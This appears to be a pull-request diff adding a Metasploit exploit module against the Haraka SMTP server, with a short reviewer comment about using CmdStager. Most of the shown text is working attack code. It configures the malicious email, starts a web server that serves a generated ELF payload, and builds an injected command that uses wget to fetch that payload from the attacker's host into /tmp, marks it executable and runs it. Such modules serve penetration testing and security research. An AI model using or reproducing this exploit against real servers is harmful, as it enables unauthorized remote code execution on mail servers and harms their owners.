modules/exploits/linux/smtp/harakiri.rb

```diff
@@ -0,0 +1,256 @@
+      [
+        OptString.new('EHLO', [ true, 'TO address of the e-mail', 'haraka.test']),
+        OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'root@haraka.test']),
+        OptString.new('MAILFROM', [ true, 'FROM address of the e-mail', 'harakiri@exploit.db']),
+        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
+        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
+      ], self.class)
+
+      register_advanced_options(
+      [
+        OptBool.new("SkipVersionCheck", [false, "Specify this to skip the version check", false])
+      ], self.class)
+
+  end
+
+
+  # wait for the data to be sent
+  def wait_linux_payload
+    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+
+    waited = 0
+    while (not @elf_sent)
+      select(nil, nil, nil, 1)
+      waited += 1
+      if (waited > datastore['HTTP_DELAY'])
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+      end
+    end
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def exploit
+    @pl = generate_payload_exe
+    @elf_sent = false
+
+    #
+    # start our web server to deploy the final payload
+    #
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+    resource_uri = '/' + downfile
+    webport = datastore['SRVPORT']
+
+    if (datastore['DOWNHOST'])
+      service_url_payload = datastore['DOWNHOST'] + resource_uri
+    else
+
+      #do not use SSL
+      if datastore['SSL']
+        ssl_restore = true
+        datastore['SSL'] = false
+      end
+
+      #we use SRVHOST as download IP for the coming wget command.
+      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+        srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
+      else
+        srv_host = datastore['SRVHOST']
+      end
+
+      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+      service_url_payload = srv_host + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      start_service({'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
+      }})
+
+      datastore['SSL'] = true if ssl_restore
+    end
+
+  cmd = "/usr/bin/wget #{service_url} -O /tmp/#{downfile};chmod 777 /tmp/#{downfile};/tmp/#{downfile}"
```

Comment:
Yes, this should attempt to use the `CmdStager`. Further efforts should be directed toward improving it. The manual process is no longer desired.